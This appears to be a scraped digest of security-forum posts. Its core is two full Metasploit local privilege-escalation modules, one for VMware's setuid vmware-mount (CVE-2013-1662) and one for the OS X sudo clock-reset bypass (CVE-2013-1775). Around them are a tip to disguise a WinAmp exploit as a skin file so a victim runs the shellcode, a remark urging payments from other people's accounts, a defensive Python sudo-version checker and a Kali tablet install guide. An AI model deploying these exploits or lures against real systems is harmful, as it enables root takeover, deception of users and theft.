Source: WinAmp 5.63 (winamp.ini) - Local Exploit

It didn't work for me on Windows 7. I'll try it on XP.

Suggestion: rename the file to ".wsz" (Winamp Skin). If someone double-clicks it, it will ask whether to install the skin and... the shellcode should execute. And it is possible to convince someone to install a new Winamp skin.
-
Keep them. Permanent ban, no accounts from payment systems or banks.
-
VMWare Setuid vmware-mount Unsafe popen(3)
Authored by Tavis Ormandy, egypt | Site metasploit.com

VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info, {
      'Name'           => 'VMWare Setuid vmware-mount Unsafe popen(3)',
      'Description'    => %q{
        VMWare Workstation (up to and including 9.0.2 build-1031769) and Player
        have a setuid executable called vmware-mount that invokes lsb_release in
        the PATH with popen(3). Since PATH is user-controlled, and the default
        system shell on Debian-derived distributions does not drop privs, we can
        put an arbitrary payload in an executable called lsb_release and have
        vmware-mount happily execute it as root for us.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy', # Vulnerability discovery and PoC
          'egypt'          # Metasploit module
        ],
      'Platform'       => [ 'linux' ],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultOptions' => {
        "PrependSetresuid" => true,
        "PrependSetresgid" => true,
      },
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'CVE', '2013-1662' ],
          [ 'OSVDB', '96588' ],
          [ 'BID', '61966'],
          [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
          [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
        ],
      'DisclosureDate' => "Aug 22 2013"
    }))

    # Handled by ghetto hardcoding below.
    deregister_options("PrependFork")
  end

  def check
    if setuid?("/usr/bin/vmware-mount")
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    # Ghetto PrependFork action which is apparently only implemented for
    # Meterpreter.
    # XXX Put this in a mixin somewhere
    # if(fork()) exit(0);
    #   6A02   push byte +0x2
    #   58     pop eax
    #   CD80   int 0x80 ; fork
    #   85C0   test eax,eax
    #   7406   jz 0xf
    #   31C0   xor eax,eax
    #   B001   mov al,0x1
    #   CD80   int 0x80 ; exit
    exe = generate_payload_exe(
      :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
    )
    write_file("lsb_release", exe)
    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f lsb_release")
  end

  # True if remote_file exists and has the setuid bit set (test -u).
  # The path passed in is used rather than a hardcoded one.
  def setuid?(remote_file)
    !!(cmd_exec("test -u #{remote_file} && echo true").index "true")
  end

end

Source: VMWare Setuid vmware-mount Unsafe popen(3) ≈ Packet Storm
-
Intel ships high-powered C++ compiler for native Android apps
Nytro replied to Matt's topic in Stiri securitate
Yes, Intel, with its CISC (Complex Instruction Set Computing) processors, is trying to muscle in on ARM, whose processors are RISC (Reduced Instruction Set Computing). Now the question is: power (Intel) or low consumption (ARM)? I wouldn't mind an Intel Atom in my phone, but I would mind the battery lasting 2 hours.
-
Or read this: Files ≈ Packet Storm. And make a few payments from other people's accounts, buy yourselves a chocolate bar.
-
Do a disclosure on the duplicates. More precisely, I don't think it takes them 2 years to fix an XSS. So in many cases I don't think it's really a duplicate. Threaten to make it public, at least see what they say.
-
memcpy((void *)(1<<12), &patch_current, 1024);
-
The purpose of the chat is for "offtopic discussions" to stay off the forum and to take place there instead. The purpose of the forum, which is what I care about, is to stay clean, and the chat helps in that respect. In other words, we are taking 2 measures:

1. Kabron keeps his moral neutrality on the chat, doesn't act like the boss, doesn't swear, and tries to keep some decency in the topics discussed on the chat. He doesn't kick/ban just because he doesn't like a certain user.
2. Matt no longer posts absolutely everything he comes across and makes a quick selection: only exploits in very well-known software, not every plugin or program nobody has heard of, and only interesting news.

And the chat will not be closed, no matter how many thousands of votes you cast for closing it. If you don't find it useful and don't like it, simply DON'T GO THERE.
-
Mac OS X Sudo Password Bypass
Authored by Todd C. Miller, juan vazquez, joev | Site metasploit.com

This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
#   http://metasploit.com/
##

require 'shellwords'

class Metasploit3 < Msf::Exploit::Local

  # ManualRanking because it's going to modify system time
  # Even when it will try to restore things, user should use
  # it at his own risk
  Rank = NormalRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"
  SUDOER_GROUP = "admin"
  VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]

  # saved clock config
  attr_accessor :time, :date, :networked, :zone, :network_server

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Mac OS X Sudo Password Bypass',
      'Description'    => %q{
        This module gains a session with root permissions on versions of OS X with
        sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,
        and possibly lower versions.

        If your session belongs to a user with Administrative Privileges
        (the user is in the sudoers file and is in the "admin group"), and the
        user has ever run the "sudo" command, it is possible to become the super
        user by running `sudo -k` and then resetting the system clock to
        01-01-1970.

        This module will fail silently if the user is not an admin or if the user
        has never run the sudo command.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Todd C. Miller',               # Vulnerability discovery
          'joev <jvennix[at]rapid7.com>', # Metasploit module
          'juan vazquez'                  # testing/fixing module bugs
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1775' ],
          [ 'OSVDB', '90677' ],
          [ 'BID', '58203' ],
          [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]
        ],
      'Platform'       => 'osx',
      'Arch'           => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [
        [ 'Mac OS X x86 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86
          }
        ],
        [ 'Mac OS X x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ],
        [ 'CMD',
          {
            'Platform' => 'unix',
            'Arch' => ARCH_CMD
          }
        ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 28 2013'
    ))

    register_advanced_options([
      OptString.new('TMP_FILE',
        [true, 'For the native targets, specifies the path that '+
        'the executable will be dropped on the client machine.',
        '/tmp/.<random>/<random>']
      ),
    ], self.class)
  end

  # ensure target is vulnerable by checking sudo vn and checking
  # user is in admin group.
  def check
    if cmd_exec("sudo -V") =~ /version\s+([^\s]*)\s*$/
      sudo_vn = $1
      sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
      # check vn between 1.6.0 through 1.7.10p6
      # and 1.8.0 through 1.8.6p6
      if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
        print_error "sudo version #{sudo_vn} not vulnerable."
        return Exploit::CheckCode::Safe
      end
    else
      print_error "sudo not detected on the system."
      return Exploit::CheckCode::Safe
    end

    if not user_in_admin_group?
      print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
      # without this return the method fell through to Vulnerable
      return Exploit::CheckCode::Safe
    end

    # one root for you sir
    Exploit::CheckCode::Vulnerable
  end

  def exploit
    if not user_in_admin_group?
      fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
    end

    # "remember" the current system time/date/network/zone
    print_good("User is an admin, continuing...")

    # drop the payload (unless CMD)
    if using_native_target?
      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
      write_file(drop_path, generate_payload_exe)
      register_files_for_cleanup(drop_path)
      cmd_exec("chmod +x #{[drop_path].shelljoin}")
      print_status("Payload dropped and registered for cleanup")
    end

    print_status("Saving system clock config...")
    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
    @network_server = if @networked
      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
    end

    run_sudo_cmd
  end

  def cleanup
    print_status("Resetting system clock to original values") if @time
    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
    if @networked
      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
      unless @network_server.nil?
        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
      end
    end
    print_good("Completed clock reset.") if @time
  end

  private

  def run_sudo_cmd
    print_status("Resetting user's time stamp file and setting clock to the epoch")
    cmd_exec(
      "sudo -k; \n"+
      "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
      " -setdate 01:01:1970 -settime 00:00"
    )

    # Run Test
    test = rand_text_alpha(4 + rand(4))
    sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
    print_status("Testing that user has sudoed before...")
    output = cmd_exec('echo "" | ' + sudo_cmd_test)
    if output =~ /incorrect password attempts\s*$/i
      fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
    elsif output =~ /#{test}/
      print_good("Test executed successfully. Running payload.")
    else
      print_error("Unknown fail while testing, trying to execute the payload anyway...")
    end

    # Run Payload
    sudo_cmd_raw = if using_native_target?
      ['sudo', '-S', [drop_path].shelljoin].join(' ')
    elsif using_cmd_target?
      ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
    end

    ## to prevent the password prompt from destroying session
    ## backgrounding the sudo payload in order to keep both sessions usable
    sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
    print_status "Running command: "
    print_line sudo_cmd
    output = cmd_exec(sudo_cmd)
  end

  # helper methods for accessing datastore
  def using_native_target?; target.name =~ /native/i; end
  def using_cmd_target?; target.name =~ /cmd/i; end
  def drop_path
    @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }
  end

  # checks that the user is in OSX's admin group, necessary to change sys clock
  def user_in_admin_group?
    cmd_exec("groups `whoami`").split(/\s+/).include?(SUDOER_GROUP)
  end

  # helper methods for dealing with sudo's vn num
  def parse_vn(vn_str); vn_str.split(/[\.p]/).map(&:to_i); end

  # e.g. vn_bt('1.7.1', [['1.7.0', '1.7.6p44']]) => true
  # Whole version arrays are compared in order (Array#<=>), so 1.6.12 is
  # below 1.7.10p6; comparing each position independently would miss it.
  def vn_bt(vn, ranges)
    vn_parts = parse_vn(vn)
    ranges.any? do |range|
      min_parts = parse_vn(range[0])
      max_parts = parse_vn(range[1])
      (vn_parts <=> min_parts) >= 0 and (vn_parts <=> max_parts) <= 0
    end
  end

end

Source: Mac OS X Sudo Password Bypass ≈ Packet Storm
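The same version-range test from the patch-management side, as an added Python example (not part of the Metasploit module above): it compares whole version tuples so a release like 1.6.12 is recognised as falling below 1.7.10p6, and it parses `sudo -V` output, which is assumed to start with a line of the form "Sudo version X.Y.ZpN" (the format the module's own regex relies on).

```python
import re

# Affected ranges, exactly as the module's VULNERABLE_VERSION_RANGES lists them:
# 1.6.0 through 1.7.10p6 and 1.8.0 through 1.8.6p6 (inclusive).
VULNERABLE_VERSION_RANGES = [("1.6.0", "1.7.10p6"), ("1.8.0", "1.8.6p6")]

_VN_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_vn(vn_str):
    """'1.7.10p6' -> (1, 7, 10, 6).  A release without a patch level gets
    patch 0, so '1.8.6' sorts before '1.8.6p1'; a distro suffix such as
    '-3ubuntu1' after the patch level is ignored."""
    m = _VN_RE.match(vn_str)
    if m is None:
        raise ValueError("unrecognised sudo version: %r" % vn_str)
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def vn_between(vn, ranges):
    """True if vn lies in any inclusive [low, high] range.  Whole tuples are
    compared lexicographically, so 1.6.12 is correctly below 1.7.10p6 even
    though 12 > 10 in the third position (a position-by-position comparison
    would wrongly call 1.6.12 safe)."""
    v = parse_vn(vn)
    return any(parse_vn(low) <= v <= parse_vn(high) for low, high in ranges)


def sudo_version_from_output(output):
    """Pull the version out of `sudo -V` output (assumed first line:
    'Sudo version X.Y.ZpN'); None when sudo is absent or printed
    something else."""
    m = re.search(r"sudo version\s+(\S+)", output, re.IGNORECASE)
    return m.group(1) if m else None


def is_vulnerable_sudo(output):
    """Inventory-side verdict for one host's `sudo -V` output: True only
    when a version was found and it sits inside an affected range."""
    vn = sudo_version_from_output(output)
    if vn is None:
        return False
    try:
        return vn_between(vn, VULNERABLE_VERSION_RANGES)
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample of `sudo -V` output, not captured from a real host.
    sample = "Sudo version 1.7.10p6\nSudoers policy plugin version 1.7.10p6\n"
    print(sudo_version_from_output(sample), is_vulnerable_sudo(sample))
```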
-
Kali Linux on Galaxy Note 10.1
April 2, 2013
06. Kali Linux ARM Architecture

The Samsung Galaxy Note 10.1 is a 10.1-inch tablet computer designed, developed, and marketed by Samsung. The tablet incorporates a 1.4 GHz quad-core Exynos processor and 2 GB of RAM. The touch screen works surprisingly well with Kali, as does the wireless card; however, Bluetooth and audio are not yet functional on this image.

Stock Kali on Galaxy Note 10.1 – Easy Version

If all you want to do is to install Kali on your Galaxy Note 10.1, follow these instructions:

1. You'll need at least 7 GB free on your internal SD card for our image.
2. Root your Samsung Galaxy Note 10.1 if you have not already done so.
3. Download the Kali Linux Galaxy Note 10.1 image from our downloads area.
4. Rename the downloaded Kali image to linux.img and copy it to /storage/sdcard0.
5. Download our recovery.img file from here and copy it to /storage/sdcard0.
6. Get root on your Galaxy Note 10.1, change to /storage/sdcard0, and back up your recovery partition:
   dd if=/dev/block/mmcblk0p6 of=recovery.img_orig
7. dd the downloaded recovery.img image to the recovery partition. Alert! This process will overwrite your recovery partition. Please make sure you know what you are doing. You may brick your device if you fumble this.
   dd if=recovery.img of=/dev/block/mmcblk0p6
8. Reboot your Galaxy Note 10.1 into recovery mode. You can do this by turning it off, then pressing and holding both the power button and the volume up button. Once you see the "Samsung Galaxy Note 10.1" text appear, release the power button but keep pressing the volume up button. This should boot you into Kali and auto-login into Gnome. The root password is "changeme" (without the quotes!).
9. Open the onscreen keyboard by going to: Applications -> Universal Access -> Florence Virtual Keyboard.
10. Wireless works but seems to skip the scanning of networks without some massaging. If the Gnome Network Manager shows no wireless networks, simply add your wireless network as a "hidden" one and you should get connected as usual.

You can modify, debug, and explore our image easily from within your Galaxy Note, using a wonderful Android App called Linux Deploy.

Source: Kali Linux on Galaxy Note 10.1 | Kali Linux Official Documentation